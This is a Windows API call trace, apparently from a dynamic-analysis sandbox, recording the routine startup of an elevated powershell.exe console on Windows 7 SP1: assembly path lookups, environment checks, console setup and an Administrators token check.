	[0311.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.794] CoTaskMemFree (pv=0x1f7a10) 
	[0311.795] CoTaskMemAlloc (cb=0x104) returned 0x1f7a10
	[0311.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.795] CoTaskMemFree (pv=0x1f7a10) 
	[0312.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0316.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0317.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0317.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0319.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0319.540] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0319.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.541] CoTaskMemFree (pv=0x1f7c30) 
	[0319.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0320.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0320.491] SetErrorMode (uMode=0x1) returned 0x1
	[0320.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14da00 | out: lpFileInformation=0x14da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0320.492] SetErrorMode (uMode=0x1) returned 0x1
	[0322.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.409] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.409] CoTaskMemFree (pv=0x1f7c30) 
	[0322.692] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.692] CoTaskMemFree (pv=0x1f7c30) 
	[0322.693] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.693] CoTaskMemFree (pv=0x1f7c30) 
	[0322.696] CoCreateGuid (in: pguid=0x14ddc8 | out: pguid=0x14ddc8*(Data1=0x7ff39d5f, Data2=0x5d9c, Data3=0x45b1, Data4=([0]=0xbd, [1]=0xb0, [2]=0xa6, [3]=0x6e, [4]=0x2c, [5]=0x25, [6]=0x4d, [7]=0x4))) returned 0x0
	[0322.699] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.699] CoTaskMemFree (pv=0x1f7c30) 
	[0322.703] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.703] CoTaskMemFree (pv=0x1f7c30) 
	[0322.705] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0322.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.706] CoTaskMemFree (pv=0x1f7c30) 
	[0322.712] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0322.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14da70 | out: lpConsoleScreenBufferInfo=0x14da70) returned 1
	[0322.719] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0322.720] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14da70 | out: lpConsoleScreenBufferInfo=0x14da70) returned 1
	[0322.721] GetVersionExW (in: lpVersionInformation=0x14da00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14da00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0322.723] GetCurrentProcess () returned 0xffffffffffffffff
	[0322.724] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14da98 | out: TokenHandle=0x14da98*=0x31c) returned 1
	[0322.727] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d9b8 | out: TokenInformation=0x0, ReturnLength=0x14d9b8) returned 0
	[0322.728] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2072e0
	[0322.728] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2072e0, TokenInformationLength=0x4, ReturnLength=0x14d9b8 | out: TokenInformation=0x2072e0, ReturnLength=0x14d9b8) returned 1
	[0322.729] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14db18 | out: phNewToken=0x14db18*=0x318) returned 1
	[0322.730] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d9b8 | out: TokenInformation=0x0, ReturnLength=0x14d9b8) returned 0
	[0322.730] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x207290
	[0322.730] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x207290, TokenInformationLength=0x4, ReturnLength=0x14d9b8 | out: TokenInformation=0x207290, ReturnLength=0x14d9b8) returned 1
	[0322.731] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2d38a58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14db28 | out: IsMember=0x14db28) returned 1
	[0322.731] CloseHandle (hObject=0x318) returned 1
	[0322.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.484] CoTaskMemAlloc (cb=0x804) returned 0x1b732080
	[0323.484] GetConsoleTitleW (in: lpConsoleTitle=0x1b732080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0323.484] CoTaskMemFree (pv=0x1b732080) 
	[0323.508] CoTaskMemAlloc (cb=0x804) returned 0x1b732930
	[0323.508] GetConsoleTitleW (in: lpConsoleTitle=0x1b732930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0323.508] CoTaskMemFree (pv=0x1b732930) 
	[0323.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.510] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0324.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.441] SetConsoleCtrlHandler (HandlerRoutine=0x27e68dc, Add=1) returned 1
	[0326.420] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0326.422] CoCreateGuid (in: pguid=0x14dc10 | out: pguid=0x14dc10*(Data1=0x23f8b6f6, Data2=0x7ea7, Data3=0x4e6d, Data4=([0]=0x82, [1]=0xa8, [2]=0x62, [3]=0x4e, [4]=0x4e, [5]=0x33, [6]=0x9f, [7]=0x72))) returned 0x0
	[0326.423] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.423] CoTaskMemFree (pv=0x1f7c30) 
	[0326.437] WinSqmIsOptedIn () returned 0x0
	[0326.437] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.437] CoTaskMemFree (pv=0x1f7c30) 
	[0326.438] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.439] CoTaskMemFree (pv=0x1f7c30) 
